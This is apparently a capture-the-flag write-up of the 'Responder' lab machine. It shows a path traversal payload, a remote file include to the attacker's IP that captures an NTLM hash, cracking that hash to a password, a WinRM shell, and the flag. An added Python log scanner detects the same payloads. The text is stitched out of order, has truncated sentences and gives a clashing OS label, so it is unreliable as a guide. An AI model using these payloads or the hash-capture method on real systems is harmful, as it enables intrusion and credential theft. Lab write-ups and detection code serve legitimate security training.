Responder (Tier 1)
Tier -> 1
Difficulty -> Very Easy
OS -> Linux
Tags -> WinRM / Custom Applications / Protocols / XAMPP / SMB / Responder / PHP / Reconnaissance / Password Cracking / Hash Capture / Remote File Inclusion / Remote Code Execution
Then I did an exhaustive scan to get more information about the service running on the open port
I found the HTTP protocol running on port 80, so I went to the browser to check the content being served. Visiting the site by IP redirected me to a domain named unika.htb, but I was unable to reach the server under that name
With this, I answered the first question
Answer: unika.htb
The reason why the page didn't show me any content was that the unika.htb hostname didn't resolve on my machine. To fix this I added an entry to the /etc/hosts file mapping the target IP to the unika.htb domain. After that, I visited the site again and it worked properly
With this, I answered the next question
Answer: php
Navigating to the top right corner I found a selector for the page language, which caught my attention. When I selected a language other than English, the language of the whole page changed and the URL showed a query parameter reflecting this action
With this, I answered the next question
Answer: page
To test whether this parameter was vulnerable to a Local File Inclusion attack, I tried reading the hosts file by changing the value of the page parameter. After some tries, I found a successful payload and the page displayed the content of the requested file
With this and a little research, I answered some questions
Answer: ../../../../../../../../windows/system32/drivers/etc/hosts
Answer: //10.10.14.6/somefile
Answer: New Technology Lan Manager
Answer: -I
Answer: John The Ripper
After that, I initialized the tool specifying the network interface I wanted to use, in this case, the tun0 interface
Then I went back to the vulnerable endpoint and modified the URL, this time attempting a Remote File Inclusion pointing at my own machine, so that the web server would connect to the Responder listener I had set up. The page displayed an error, but when I checked the terminal, Responder had captured the target's credentials
With this and a little research, I answered the next questions
Answer: badminton
Answer: 5985
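From the defender's side, the two abuses of the page parameter described above (the traversal to the hosts file and the remote include pointing at an attacker host) are easy to spot in web server logs. The following is an added example, not code from the original write-up, with constructed Apache-style log lines and an assumed allowlist of the legitimate language pages; it also catches URL-encoded and backslash variants of the same patterns.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from the original page);
# the page= values mirror the traversal and remote-include requests in the write-up.
SAMPLE_LOG = """\
10.10.14.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 1024
10.10.14.6 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 512
10.10.14.6 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 300
10.10.14.6 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?page=//10.10.14.6/somefile HTTP/1.1" 500 200
10.10.14.6 - - [01/Jan/2024:10:00:25 +0000] "GET /index.php?page=german.html HTTP/1.1" 200 1030
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Assumed allowlist: the only include targets the language selector should ever use.
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}


def classify_page_value(value: str) -> Optional[str]:
    """Label a page= value as a finding, or return None if it is an allowed page."""
    # Decode twice to defeat double encoding, and normalise Windows separators.
    decoded = unquote(unquote(value)).replace("\\", "/")
    if decoded in ALLOWED_PAGES:
        return None
    # UNC path (//host/share) or URL wrapper: remote include / hash-capture attempt.
    if decoded.startswith("//") or re.match(r"^[a-z]+://", decoded):
        return "remote-include"
    # Parent-directory hops, drive letters or absolute paths: traversal to local files.
    if "../" in decoded or re.match(r"^[A-Za-z]:/", decoded) or decoded.startswith("/"):
        return "path-traversal"
    return "unexpected-page"


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, label, raw_value) for every suspicious page= parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for value in query.get("page", []):
            label = classify_page_value(value)
            if label:
                findings.append((line.split()[0], label, value))
    return findings
```

Running scan_log(SAMPLE_LOG) flags the two traversal requests and the remote include while leaving the two legitimate language pages alone.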
Having these credentials, I could try to connect to the system directly. For this purpose, I used the evil-winrm tool to get a shell, and it worked successfully
Searching through the system, I found a file called flag.txt in the C:\Users\mike\Desktop folder. Finally, I checked the content of the flag.txt file, retrieving the flag
With this, I got the root flag and pwned the machine
Answer: ea81b7afddd03efaa0945333ed147fac
I started doing an initial scan using
To learn more about the HTTP protocol you can go
Once there, I found a dashboard page for a business with some buttons that didn't work. Exploring the page I didn't find anything relevant, so I used the extension to get some extra information about the technologies used by the site
To learn more about Local File Inclusion exploitation you can go
Knowing that I could abuse this, I tried using the utility to intercept the communication between the web server and my machine. The goal was to capture credentials for the internal SMB service, since the target was a Windows system and was likely running it. I started by configuring the tool, modifying the Responder.conf file to set the SMB value to On
To learn more about Remote File Inclusion exploitation you can go
I captured the communication from the Administrator user and the corresponding hash, so I saved it to a text file. I could then try to crack the hash using the tool and the well-known rockyou.txt dictionary. After running it, I observed that the cracking process was successful, yielding the password badminton for the user Administrator